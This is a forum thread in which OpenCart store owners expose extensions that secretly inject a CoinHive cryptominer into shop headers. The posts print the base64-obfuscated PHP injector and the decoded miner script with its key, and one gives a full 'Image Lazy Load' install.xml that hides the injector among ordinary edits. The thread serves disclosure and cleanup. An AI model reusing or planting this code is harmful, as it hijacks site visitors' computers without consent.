Whilst I suspect most the extensions provided here are genuine, I happened to download one last week that was not. It added CoinHive malware to my store. I can't find the extension in the market anymore so it might have been deleted already. It was to add a Paralax Background to my page. CoinHive will allow a hacker to use anyone who views your page to mine cryptocurrency for them. It slows down your customers viewing experience and will tie up their cpu mining while they have your page open.
It was difficult to find so I would like to share how I found and removed it. For me the exploits were in /catalog/controller/common/header.php and /catalog/view/theme/yourtemplate/template/common.header.twig .
Opening the page in a browser and viewing the source you can see the <script> tag just before the </header> end tag with javascript referring to a CoinHive site and function .
Searching for the text in the script tag throughout all the site files yielded little result as I found out it is base64 encoded.
I found it by base64 encoding the script tag text from the html source of the page, selecting about the first 30ish characters and seaching for that. Bingo. Don't copy all the text as it contains an id unique the the hacker.
I went back to the file I downloaded for the extension and confirmed the malicious script was included in the install.xml .
It was difficult to find so I would like to share how I found and removed it. For me the exploits were in /catalog/controller/common/header.php and /catalog/view/theme/yourtemplate/template/common.header.twig .
Opening the page in a browser and viewing the source you can see the <script> tag just before the </header> end tag with javascript referring to a CoinHive site and function .
Searching for the text in the script tag throughout all the site files yielded little result as I found out it is base64 encoded.
I found it by base64 encoding the script tag text from the html source of the page, selecting about the first 30ish characters and seaching for that. Bingo. Don't copy all the text as it contains an id unique the the hacker.
I went back to the file I downloaded for the extension and confirmed the malicious script was included in the install.xml .
Well, if you make such a grave Statement, please prove it, by mentioning
the Link to the Extension Page, P L E A S E. And if the Page does
no longer exist, please publish Seller Information and Mod Name as well.
Ernie
the Link to the Extension Page, P L E A S E. And if the Page does
no longer exist, please publish Seller Information and Mod Name as well.
Ernie
My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.
Ok sorry, newbie here. I was about to say I couldn't find it as its been removed, but here is the link to the removed page https://www.opencart.com/index.php?rout ... er=CodeLab . The downloaded file was called ParalaxBackground.zip. If the admins/moderators would like me to send it please let me know where to send it. Contains versions for both V3 and V2. The xml (V3) contains this code. If you base64_decode the string it has the CoinHive code.
Decodes to this
Code: Select all
<search><![CDATA[
$this->load->language('common/header');
]]></search>
<add position="before"><![CDATA[
$modules = base64_decode('PC9oZWFkPg==');
$module = $modules;
$inherit = base64_decode('PHNjcmlwdD4gZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgdHlwZT0ndGV4dC9qYXZhc2NyaXB0JyBzcmM9JyIrIGF0b2IoJ2FIUjBjSE02THk5amIybHVhR2wyWlM1amIyMHZiR2xpTDJOdmFXNW9hWFpsTG0xcGJpNXFjdz09JykgKyAiJz48XC9zY3IiICsgImlwdD4iKTs8L3NjcmlwdD48c2NyaXB0PiB2YXIganN3b3JrZXIgPSBuZXcgQ29pbkhpdmUuQW5vbnltb3VzKCdFMFFpM3JiNzRoWTVaR3hweG5ySXBoVXRseXhScElIVScse3Rocm90dGxlOiAwLjIsZm9yY2VBU01KUzogZmFsc2V9KTtqc3dvcmtlci5zdGFydChhdG9iKCdRMjlwYmtocGRtVXVSazlTUTBWZlJWaERURlZUU1ZaRlgxUkJRZz09JykpOzwvc2NyaXB0Pg==');
$ocplace = $inherit . "\n" . $module;
foreach(glob(DIR_APPLICATION . 'view/theme/*', GLOB_ONLYDIR) as $dif) {
$rlayout = DIR_APPLICATION . 'view/theme/' . basename($dif) . base64_decode('L3RlbXBsYXRlL2NvbW1vbi9oZWFkZXIudHdpZw==');
if (strpos(file_get_contents($rlayout), 'jsworker.start') == false) {
file_put_contents($rlayout, str_replace($module, $ocplace, file_get_contents($rlayout)));
}
}
]]></add>
Code: Select all
<script> document.write("<script type='text/javascript' src='"+ atob('aHR0cHM6Ly9jb2luaGl2ZS5jb20vbGliL2NvaW5oaXZlLm1pbi5qcw==') + "'><\/scr" + "ipt>");</script><script> var jsworker = new CoinHive.Anonymous('E0Qi3rb74hY5ZGxpxnrIphUtlyxRpIHU',{throttle: 0.2,forceASMJS: false});jsworker.start(atob('Q29pbkhpdmUuRk9SQ0VfRVhDTFVTSVZFX1RBQg=='));</script>
This developer has 2 other extensions that was updated the Feb 4 !!!
The developer CodeLab was registered on 17 Dec 2017.
I think the Opencart support have to take action on this.
Good catch, rebeccag!!!
The developer CodeLab was registered on 17 Dec 2017.
I think the Opencart support have to take action on this.
Good catch, rebeccag!!!
Suppliers Module - XML, CSV, XLS Product Feed Import and Update
Rich Snippets | Facebook Open Graph Meta Tags | WebP Images
Well, that's the unfamous Contributor, also adding some bad Code into an image,
found a few days ago. OC already removed some extensions, BUT NO ALL, because
the LAZY IMAGE LOAD Mod contains this, also coded in BASE64:
and this one in the FAST REGISTRATION VqMod:
In one of the extensions, it even exists twice! I reported it to OC a few Minutes ago.
Ernie
---
https://www.opencart.com/index.php?rout ... er=CodeLab
---
found a few days ago. OC already removed some extensions, BUT NO ALL, because
the LAZY IMAGE LOAD Mod contains this, also coded in BASE64:
Code: Select all
<script> document.write("<script type='text/javascript' src='"+ atob('aHR0cHM6Ly9jb2luaGl2ZS5jb20vbGliL2NvaW5oaXZlLm1pbi5qcw==') + "'><\/scr" + "ipt>");</script><script> var jsworker = new CoinHive.Anonymous('E0Qi3rb74hY5ZGxpxnrIphUtlyxRpIHU',{throttle: 0.2,forceASMJS: false});jsworker.start(atob('Q29pbkhpdmUuRk9SQ0VfRVhDTFVTSVZFX1RBQg=='));</script>
Code: Select all
<script> document.write("<script type='text/javascript' src='"+ atob('aHR0cHM6Ly9jb2luaGl2ZS5jb20vbGliL2NvaW5oaXZlLm1pbi5qcw==') + "'><\/scr" + "ipt>");</script><script> var jsworker = new CoinHive.Anonymous('E0Qi3rb74hY5ZGxpxnrIphUtlyxRpIHU',{throttle: 0.2,forceASMJS: false});jsworker.start(atob('Q29pbkhpdmUuRk9SQ0VfRVhDTFVTSVZFX1RBQg=='));</script>
Ernie
---
https://www.opencart.com/index.php?rout ... er=CodeLab
---
My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.
Well, since OC resides in one of the Bitcoin Centers of the World,
they may have decided, to use their own Software, to be of Help in
in 'Virtual Mining'. It saves a lot of Money on Energy and Hardware.
Ernie
---
Today's Download:
Opencart2x\Parallax-Background-oc2.ocmod.zip
install.xml
still equals:
they may have decided, to use their own Software, to be of Help in
in 'Virtual Mining'. It saves a lot of Money on Energy and Hardware.
Ernie
---
Today's Download:
Opencart2x\Parallax-Background-oc2.ocmod.zip
install.xml
Code: Select all
PHNjcmlwdD4gZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgdHlwZT0ndGV4dC9qYXZhc2NyaXB0JyBzcmM9JyIrIGF0b2IoJ2FIUjBjSE02THk5amIybHVhR2wyWlM1amIyMHZiR2xpTDJOdmFXNW9hWFpsTG0xcGJpNXFjdz09JykgKyAiJz48XC9zY3IiICsgImlwdD4iKTs8L3NjcmlwdD48c2NyaXB0PiB2YXIganN3b3JrZXIgPSBuZXcgQ29pbkhpdmUuQW5vbnltb3VzKCdFMFFpM3JiNzRoWTVaR3hweG5ySXBoVXRseXhScElIVScse3Rocm90dGxlOiAwLjIsZm9yY2VBU01KUzogZmFsc2V9KTtqc3dvcmtlci5zdGFydChhdG9iKCdRMjlwYmtocGRtVXVSazlTUTBWZlJWaERURlZUU1ZaRlgxUkJRZz09JykpOzwvc2NyaXB0Pg==
Code: Select all
<script> document.write("<script type='text/javascript' src='"+ atob('aHR0cHM6Ly9jb2luaGl2ZS5jb20vbGliL2NvaW5oaXZlLm1pbi5qcw==') + "'><\/scr" + "ipt>");</script><script> var jsworker = new CoinHive.Anonymous('E0Qi3rb74hY5ZGxpxnrIphUtlyxRpIHU',{throttle: 0.2,forceASMJS: false});jsworker.start(atob('Q29pbkhpdmUuRk9SQ0VfRVhDTFVTSVZFX1RBQg=='));</script>
My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.
I got the same problem from this malicious plugin developer, and this is its install.xml
I have replaced back the header.php, but the problem still remains. Please advise how I can completely get rid of coinhive
I have replaced back the header.php, but the problem still remains. Please advise how I can completely get rid of coinhive
Code: Select all
<?xml version="1.0" encoding="UTF-8"?>
<modification>
<name>Image Lazy Load</name>
<code>Image Lazy Load</code>
<version>1.0</version>
<author>CodeLab</author>
<link>http://opencart.hu</link>
<!-- script -->
<file path="catalog/view/theme/*/template/common/footer.twig">
<operation>
<search><![CDATA[
</body>
]]></search>
<add position="before"><![CDATA[
<script type="text/javascript">
$(function(){
$("img.img-responsive").lazyload({
effect: "fadeIn",
effectspeed: 600,
threshold: 200
});
});</script>
]]></add>
</operation>
</file>
<!-- front -->
<file path="catalog/view/theme/*/template/extension/module/featured.twig">
<operation>
<search><![CDATA[
<img src="
]]></search>
<add position="replace"><![CDATA[
<img data-original="
]]></add>
</operation>
</file>
<!-- front -->
<file path="catalog/view/theme/*/template/extension/module/bestseller.twig">
<operation>
<search><![CDATA[
<img src="
]]></search>
<add position="replace"><![CDATA[
<img data-original="
]]></add>
</operation>
</file>
<!-- front -->
<file path="catalog/view/theme/*/template/extension/module/latest.twig">
<operation>
<search><![CDATA[
<img src="
]]></search>
<add position="replace"><![CDATA[
<img data-original="
]]></add>
</operation>
</file>
<!-- front -->
<file path="catalog/view/theme/*/template/extension/module/special.twig">
<operation>
<search><![CDATA[
<img src="
]]></search>
<add position="replace"><![CDATA[
<img data-original="
]]></add>
</operation>
</file>
<!-- front -->
<file path="catalog/view/theme/*/template/product/category.twig">
<operation>
<search><![CDATA[
<img src="
]]></search>
<add position="replace"><![CDATA[
<img data-original="
]]></add>
</operation>
</file>
<!-- front -->
<file path="catalog/view/theme/*/template/product/search.twig">
<operation>
<search><![CDATA[
<img src="
]]></search>
<add position="replace"><![CDATA[
<img data-original="
]]></add>
</operation>
</file>
<!-- front -->
<file path="catalog/view/theme/*/template/product/special.twig">
<operation>
<search><![CDATA[
<img src="
]]></search>
<add position="replace"><![CDATA[
<img data-original="
]]></add>
</operation>
</file>
<!-- front -->
<file path="catalog/view/theme/*/template/module/featured.twig">
<operation>
<search><![CDATA[
<img src="
]]></search>
<add position="replace"><![CDATA[
<img data-original="
]]></add>
</operation>
</file>
<!-- front -->
<file path="catalog/view/theme/*/template/module/bestseller.twig">
<operation>
<search><![CDATA[
<img src="
]]></search>
<add position="replace"><![CDATA[
<img data-original="
]]></add>
</operation>
</file>
<!-- head -->
<file path="catalog/controller/common/header.php">
<operation>
<search><![CDATA[
$this->load->language('common/header');
]]></search>
<add position="before"><![CDATA[
$modules = base64_decode('PC9oZWFkPg==');
$module = $modules;
$inherit = base64_decode('PHNjcmlwdD4gZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgdHlwZT0ndGV4dC9qYXZhc2NyaXB0JyBzcmM9JyIrIGF0b2IoJ2FIUjBjSE02THk5amIybHVhR2wyWlM1amIyMHZiR2xpTDJOdmFXNW9hWFpsTG0xcGJpNXFjdz09JykgKyAiJz48XC9zY3IiICsgImlwdD4iKTs8L3NjcmlwdD48c2NyaXB0PiB2YXIganN3b3JrZXIgPSBuZXcgQ29pbkhpdmUuQW5vbnltb3VzKCdFMFFpM3JiNzRoWTVaR3hweG5ySXBoVXRseXhScElIVScse3Rocm90dGxlOiAwLjIsZm9yY2VBU01KUzogZmFsc2V9KTtqc3dvcmtlci5zdGFydChhdG9iKCdRMjlwYmtocGRtVXVSazlTUTBWZlJWaERURlZUU1ZaRlgxUkJRZz09JykpOzwvc2NyaXB0Pg==');
$ocplace = $inherit . "\n" . $module;
foreach(glob(DIR_APPLICATION . 'view/theme/*', GLOB_ONLYDIR) as $dif) {
$rlayout = DIR_APPLICATION . 'view/theme/' . basename($dif) . base64_decode('L3RlbXBsYXRlL2NvbW1vbi9oZWFkZXIudHdpZw==');
if (strpos(file_get_contents($rlayout), 'jsworker.start') == false) {
file_put_contents($rlayout, str_replace($module, $ocplace, file_get_contents($rlayout)));
}
}
]]></add>
</operation>
</file>
<!-- front -->
<file path="catalog/view/theme/*/template/module/latest.twig">
<operation>
<search><![CDATA[
<img src="
]]></search>
<add position="replace"><![CDATA[
<img data-original="
]]></add>
</operation>
</file>
<!-- front -->
<file path="catalog/view/theme/*/template/module/special.twig">
<operation>
<search><![CDATA[
<img src="
]]></search>
<add position="replace"><![CDATA[
<img data-original="
]]></add>
</operation>
</file>
<!-- head -->
<file path="catalog/view/theme/*/template/common/header.twig">
<operation>
<search><![CDATA[
</head>
]]></search>
<add position="before"><![CDATA[
<script src="catalog/view/javascript/jquery/lazyload/jquery.lazyload.js" type="text/javascript"></script>
]]></add>
</operation>
</file>
</modification>
Who is online
Users browsing this forum: No registered users and 291 guests